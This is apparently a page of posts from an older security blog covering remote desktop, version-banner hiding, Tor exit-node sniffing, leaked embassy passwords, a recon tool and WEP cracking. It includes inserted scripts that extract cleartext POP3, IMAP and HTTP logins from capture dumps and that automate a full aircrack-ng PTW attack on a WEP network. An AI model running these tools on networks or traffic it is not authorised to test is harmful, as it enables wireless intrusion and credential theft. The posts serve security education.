base under attack
ethical hacking, penetration testing, IT security and other news

Nov
08

I had been searching for a secure remote desktop solution for Linux for years. Most solutions I had tried were either terribly insecure or painfully slow, or both. The various flavors of VNC (and their relatives) have been plagued with security holes, a lack of encryption, and poor speed. Microsoft Terminal Services and Remote Desktop are faster than VNC and authenticate better, but the protocol's own RC4-based encryption does not authenticate the server (a man-in-the-middle can sit between client and server unless TLS is turned on), and it obviously does not run on Linux.

NoMachine NX is a fast, secure remote desktop system with servers for Linux and Solaris and clients for just about everything else. It encrypts all communications by tunneling them through SSH, and authenticates with SSH keys rather than passwords alone. All this, and it somehow performs at near native speed; it is about the closest thing you can get to actually sitting in front of the box. Unlike VNC, which attaches to an existing session and essentially hijacks the console's keyboard and mouse, NX spawns a new X session for each connection and lets you disconnect from that session without ending it.

Oh, and it’s a free download. I’m a huge fan.

Sep
16

It’s very common for open source web applications (and some commercial software) to place a “Powered by ____ version x.x.x” notice on publicly accessible pages. Beyond advertising, there is little or no reason to disclose this. While some license agreements require that the notice stay visible, you can usually remove the specific version number and remain compliant. If not, talk to the vendor: you shouldn’t have to give away your specific implementation details to the world.

So why is this an issue? Because it allows easy enumeration of vulnerable sites using Google and other search engines. This type of reconnaissance is completely passive, never touches your server, and is easy enough for any script kiddie to do. When a new vulnerability is announced for Coolblogprogram v1.2.3, you better believe there will be script kiddies all over the world searching Google for “Powered by Coolblogprogram v1.2.3”. Mass exploitation scripts are easy to write when getting a list of vulnerable sites is that easy.

Have you been hacked through a popular web-based application? Check your web server logs for the referring search engine query (the Referer header on the first request before the attack). If it was a common exploit, there’s a good chance someone, or a bot, searched for the vulnerable version string and found your site that way.

Unless you have a really compelling reason to tell all your visitors exactly what version you are running, I highly recommend removing the version number from all publicly accessible web pages. This can usually be done by editing the header and footer templates of the software. While this will not stop a determined attacker from fingerprinting what you’re running by other means, it cuts down on the script kiddies that love to mass exploit and deface sites running popular web apps.

These notices are usually found in the following places:

1. Web site footer - near the copyright notice at the bottom

2. Title tag

3. Meta tags - such as generator, description, and keywords

4. Other locations. Grep the HTML source, including HTML comments and the paths of linked stylesheets and scripts, for the application name and version string to find any hidden notices.
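As an added example (not code from the original post), here is a small shell helper that does the check the list above describes: it scans a saved page for “Powered by” notices, generator meta tags, and any dotted version number, including ones in the title tag and HTML comments. The sample page it writes is constructed for the example; the site, product name and version in it are placeholders.

```shell
#!/bin/sh
# Added example, not from the original post: find version-disclosing
# strings in a page's HTML before deciding what to strip from the
# templates. The sample page below is constructed for the example.
set -u

SAMPLE="${TMPDIR:-/tmp}/version-leak-sample.html"
cat > "$SAMPLE" <<'EOF'
<html><head>
<title>Example Blog - Coolblogprogram 1.2.3</title>
<meta name="generator" content="Coolblogprogram 1.2.3" />
<meta name="description" content="An example blog" />
</head><body>
<p>Hello, world.</p>
<div id="footer">&copy; 2007 - Powered by <a href="http://example.invalid/">Coolblogprogram</a> v1.2.3</div>
<!-- theme: default, built for Coolblogprogram 1.2.3 -->
</body></html>
EOF

# Print each line of $1 that carries a likely version disclosure, prefixed
# with its line number: "Powered by" notices, generator meta tags, and any
# dotted version number (x.y or x.y.z) wherever it appears, including the
# title tag and HTML comments. A line matching several rules is printed once.
find_version_banners() {
    {
        grep -i -n 'powered by' "$1" || true
        grep -i -n '<meta[^>]*name="\{0,1\}generator' "$1" || true
        grep -n -E '(^|[^0-9.])[0-9]+\.[0-9]+(\.[0-9]+)?([^0-9.]|$)' "$1" || true
    } | sort -t: -k1,1n -u
}

# Number of disclosing lines, for a quick pass/fail in a deploy script.
count_version_banners() {
    find_version_banners "$1" | wc -l | tr -d ' '
}

# To check a live page instead of a saved file (network access assumed):
#   curl -s http://example.invalid/ > page.html && find_version_banners page.html

find_version_banners "$SAMPLE"
```

Run it against every page type your application serves (front page, single post, feeds, error pages), since templates differ; a count of zero is what you want after editing the header and footer templates.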

Disclaimer: I don’t recommend “security through obscurity” (of which this is an example) as an effective security approach. However, with the plethora of spam bots, wannabe google hackers, and script kiddies - using this technique of anonymizing your web-based applications could save you a lot of trouble, and reduce the malicious traffic you receive. Just keep in mind that ultimately, the application is still just as vulnerable as it was before.

Sep
12

Tor is an anonymity system based on so-called “onion routing”. It is meant to allow anonymous web browsing, instant messaging, file transfer, and more. It does this by building virtual tunnels (circuits) between you and your destination over the Tor network, with the traffic encrypted in layers so that no single relay knows both where it came from and where it is going. Users of Tor can opt to relay traffic for the network or even run an exit node (the final hop between Tor and the destination). Both the Tor network and the software are free.

However, there are some significant dangers in using this service. For one, exit nodes, which see the traffic in whatever form the application sent it (cleartext, unless the application itself used TLS) before it goes on to the destination, are not vetted in any way and can be run by anyone willing to download and install the software. That is a significant risk when the exit node is run by an untrusted party, and you have no way of knowing who that is. The other issue is the liability of relaying Tor traffic or running an exit node: there is a chance that you will be passing illegal traffic through your machine and your own internet connection. And while the Tor website may focus on the legitimate uses of the service, this is the real world, and you better believe there is some very bad stuff going through that network.

By this time, you have probably figured out how Dan Egerstad, the “researcher” who published the embassy email passwords, acquired his data. He simply ran his own Tor exit nodes and sniffed what came out of them. Tor only encrypts traffic between the client and the exit node; whatever leaves the exit is exactly what the application sent, so POP3, IMAP and webmail logins made over Tor without TLS arrive at the exit node in the clear. The data was never encrypted end to end, and using Tor actually put it in front of a stranger rather than anonymizing anything.

Aug
31

Dan Egerstad, a Swedish security consultant, has discovered a vulnerability that gave him access to passwords for thousands of email accounts belonging to foreign embassies around the world. After attempting to contact some of the victims and receiving no response, he decided to publish 100 of these passwords on a blog.

Egerstad claims to have already read thousands of emails from these accounts, many containing very sensitive information. The only detail he released about the vulnerability was that it involved a free email encryption program that was misconfigured and used in a way the vendor recommends against. The passwords were gathered by passively sniffing unencrypted data from a “man-in-the-middle” position. No further details have been made available.

The list includes accounts belonging to embassies of Kazakhstan, India, Russia, Uzbekistan, Kyrgyzstan, Japan, Mongolia, and more. Other accounts belonged to the Office of the Dalai Lama, the UK Visa Application Centre in Nepal, and the Hong Kong Democratic Party. No US embassies were on the list.

A quick glance at the list shows poor password policy in many cases. Passwords like “1234”, “123456”, and “password” are a few examples.
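To make concrete what an exit-node operator (or anyone else on the path) sees, here is an added example that is not part of the original posts on Tor or on the Egerstad list. It pulls logins out of cleartext POP3, IMAP and HTTP Basic exchanges in a text dump of reassembled TCP payloads (the kind of output tcpflow or ngrep produce) and flags the sort of passwords that appeared on the published list. The capture, the account names and the weak-password list are all constructed for the example; the tools that would produce such a dump are an assumption, not something the posts describe.

```shell
#!/bin/sh
# Added example, not from the original posts: what cleartext mail and web
# logins look like to whoever operates the exit node. The "capture" below
# is a constructed sample of reassembled TCP payloads, not real data.
set -u

CAPTURE="${TMPDIR:-/tmp}/exit-node-sample.txt"
cat > "$CAPTURE" <<'EOF'
+OK POP3 server ready
USER ambassador
PASS 123456
+OK Logged in.
a001 LOGIN "attache@example.invalid" "s3cret"
a001 OK LOGIN completed
GET /webmail/ HTTP/1.1
Host: mail.example.invalid
Authorization: Basic dXNlcjpwYXNz
EOF

# Pull credentials from cleartext POP3 (USER/PASS), IMAP (LOGIN) and
# HTTP Basic (base64 of "user:pass") exchanges in $1.
# Output: one "proto user password" line per login seen.
extract_plaintext_creds() {
    awk '
        { sub(/\r$/, "") }                        # tolerate CRLF line endings
        toupper($1) == "USER" { user = $2; next }
        toupper($1) == "PASS" { print "pop3", user, $2; next }
        toupper($2) == "LOGIN" {
            gsub(/"/, "", $3); gsub(/"/, "", $4)  # IMAP may quote the strings
            print "imap", $3, $4; next
        }
        $1 == "Authorization:" && $2 == "Basic" {
            cmd = "printf %s " $3 " | base64 -d"
            cmd | getline decoded; close(cmd)
            i = index(decoded, ":")               # password may itself contain ":"
            print "http-basic", substr(decoded, 1, i - 1), substr(decoded, i + 1)
        }
    ' "$1"
}

# Constructed list of the kind of passwords on the published embassy list.
WEAK_LIST="1234 123456 password"

# Reads "proto user password" lines on stdin; appends " (weak)" when the
# password is on WEAK_LIST.
flag_weak() {
    while read -r proto user pass; do
        flag=""
        for w in $WEAK_LIST; do
            if [ "$pass" = "$w" ]; then flag=" (weak)"; fi
        done
        printf '%s %s %s%s\n' "$proto" "$user" "$pass" "$flag"
    done
}

extract_plaintext_creds "$CAPTURE" | flag_weak
```

None of this would be visible if the client had used POP3S, IMAPS or HTTPS (or STARTTLS where the server offers it): Tor protects the path to the exit node, and only end-to-end encryption protects what leaves it.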

Aug
28

Paterva Evolution is a new reconnaissance tool that quickly draws graphs of the relationships between internet infrastructure (domain names, IP addresses, web sites) and personal attributes (names, email addresses, phone numbers). It is written in Java and runs on Windows, Linux, and Mac OS X. The GUI is in beta, but it appears to work pretty well so far.

The rate at which you can gather intelligence with this tool is amazing. Starting from a single attribute, such as a domain name, you run “transforms” that look up related information from sources around the internet. The process is very fast and produces a graph showing the links between the pieces of data, along with the details of each attribute. Transforms on names or email addresses go as far as pulling up photos from social networking sites.

There’s little or no documentation available yet, unfortunately. Getting started with the UI can be a little confusing at first, but here are some basic steps:

1. From the “Palette” pane on the right, click and drag an icon for whatever information you want to begin with (such as a domain name) onto the graph (the main window in the middle).

2. Double click the icon in the graph to edit it.

3. Right click on it to see a list of available transforms (data that can be gathered and related to it). Choose “All Transforms” to perform them all.

4. A new list of icons should appear, connected to the original item. Select any item to see the details in the “Evolution Detail View” on the right. You can perform additional transforms on any of these items by right clicking and selecting transforms.

5. You can click and drag any item around the graph. The scroll wheel on your mouse will zoom in and out, which will be useful as you start to gather more data.

Aug
22

It has been trivial to break WEP for years now. Automated tools using statistical attacks (FMS and KoreK) plus traffic injection have made it easy to recover WEP keys (both 104-bit, usually marketed as 128-bit, and 40-bit) on average laptop or desktop hardware in a matter of hours.

Now it is even more of a joke to break WEP. A new attack, called PTW (after its authors Tews, Weinmann and Pyshkin), recovers 104-bit WEP keys with as few as 40,000 unique IVs (roughly a 50% success rate; around 85,000 IVs brings it to about 95%), and that many IVs can be generated by injection in only minutes. If you’re still using WEP, stop it. Now.

The PTW attack is implemented in aircrack-ng versions 0.9 and up, available from the aircrack-ng site. For those of you using BackTrack 2: it ships an older version of aircrack-ng, so you’ll need to upgrade either by compiling from source or by using the latest Slax module (a development version, but it usually works well).

The process of breaking the key with PTW works much like the old attacks: start gathering a capture file with airodump-ng, inject traffic with aireplay-ng to speed things up (if necessary), and point aircrack-ng at the capture file. There are a few differences:

1. The PTW attack gives up very quickly if you don’t have enough IVs, rather than grinding on forever like the old methods (usually with no chance of recovering the key). It retries automatically after every 5,000 additional IVs instead of tying up your CPU in between.

2. The PTW attack only works with full packet captures, because it needs the first bytes of each packet’s keystream, which it gets from ARP packets whose plaintext is known. Files containing IVs only (.ivs) are not currently supported.

3. You must pass the -z option to aircrack-ng 0.9.x to select the PTW attack. In the 1.0 development versions, PTW is the default.

I’ve tested the PTW attack on my access point at home, and it was able to retrieve a 104-bit key with about 50,000 IVs. Injecting the traffic using aireplay-ng’s ARP replay attack took only a few minutes. 40-bit keys can be done even faster.
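The steps above, scripted end to end, as an added example that is not part of the original post. The interface name, channel, BSSID, ESSID and client MAC are placeholders, the banner format parsed from `aircrack-ng --help` is an assumption, and the card is assumed to already be in monitor mode (on BackTrack 2 with madwifi that means `airmon-ng start wifi0`, which creates a separate interface; other drivers name it differently). Run it as root, against your own access point only.

```shell
#!/bin/sh
# Added example, not from the original post: the PTW workflow as a script.
# Placeholders (not in the post): IFACE, CHANNEL, BSSID, ESSID, OURMAC.
# The card must already be in monitor mode (airmon-ng start <iface> <channel>).
set -u

IFACE="${IFACE:-ath0}"                  # monitor-mode interface (placeholder)
CHANNEL="${CHANNEL:-6}"
BSSID="${BSSID:-00:11:22:33:44:55}"     # placeholder AP MAC
ESSID="${ESSID:-testnet}"               # placeholder network name
OURMAC="${OURMAC:-00:aa:bb:cc:dd:ee}"   # placeholder client MAC
PREFIX="${PREFIX:-ptw-capture}"         # airodump-ng writes $PREFIX-01.cap

# aircrack-ng 0.9.x needs -z to select PTW; the 1.0 development versions
# make it the default, so the flag is only emitted for 0.x releases.
ptw_flag() {
    case "$1" in
        0.*) printf '%s' '-z' ;;
        *)   printf '%s' '' ;;
    esac
}

# Read the installed version from the help banner. Assumed banner format:
# "Aircrack-ng 0.9.1 - (C) 2006,2007 ..." (first line of `aircrack-ng --help`).
aircrack_version() {
    aircrack-ng --help 2>&1 | sed -n 's/^[Aa]ircrack-ng \([0-9][0-9.a-z-]*\).*/\1/p' | head -n 1
}

run_attack() {
    # 1. Capture full packets, not --ivs: PTW needs the packet bodies.
    airodump-ng -c "$CHANNEL" --bssid "$BSSID" -w "$PREFIX" "$IFACE" &
    dump_pid=$!
    sleep 5
    # 2. Fake-authenticate so the AP accepts our frames, then replay captured
    #    ARP requests to make the AP emit fresh IVs quickly.
    aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$OURMAC" "$IFACE"
    aireplay-ng -3 -b "$BSSID" -h "$OURMAC" "$IFACE" &
    replay_pid=$!
    # 3. Crack. aircrack-ng re-reads the growing capture after every 5,000
    #    new IVs; around 40,000 is where PTW starts to have a real chance.
    aircrack-ng $(ptw_flag "$(aircrack_version)") -b "$BSSID" "$PREFIX"-*.cap
    kill "$replay_pid" "$dump_pid" 2>/dev/null
}

# Only start the live attack when explicitly asked, so the file can be
# sourced for its helpers without touching the radio.
if [ "${RUN_PTW:-}" = "1" ]; then
    run_attack
fi
```

Invoke it with `RUN_PTW=1 BSSID=... ESSID=... IFACE=... sh ptw.sh`; the version check means the same script works whether the box has 0.9.x (needs -z) or a 1.0 development build (rejects nothing, PTW already default).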

Aug
14

New German anti-hacking laws (the “hacker paragraph”, § 202c StGB), in effect as of this past Sunday, make it illegal to possess, create, or distribute hacking tools (aka security tools) that could be used to commit crimes. The vague wording could well cover things like nmap and Nessus, which are just as useful for ethical hacking. And I’m sure it will most certainly cover exploit code, password crackers, and exploitation frameworks like Metasploit.

Some security research teams and sites that hosted “hacking” tools (aka security tools) and proof of concept exploits are already moving their operations to other countries, such as the Netherlands. Phenoelit, KisMAC, and the Month of PHP Bugs have already acted.

And what does this mean to security professionals? Or even network administrators auditing their own networks? I’m sure the law was written with good intentions, but this kind of unclear wording is going to cause some serious issues in the security field.

I’m definitely not bringing my laptop to Germany…

Aug
13

BackTrack 2 is a live CD Linux distribution designed for penetration testers. It is packed with hundreds of ready-to-use tools for security professionals and is based on Slax (a live CD Slackware).

This mini-tutorial will show you how to get BackTrack 2 up and running inside VMware Workstation and installed to the virtual hard disk. This should work the same in both VMware Workstation 5 and 6.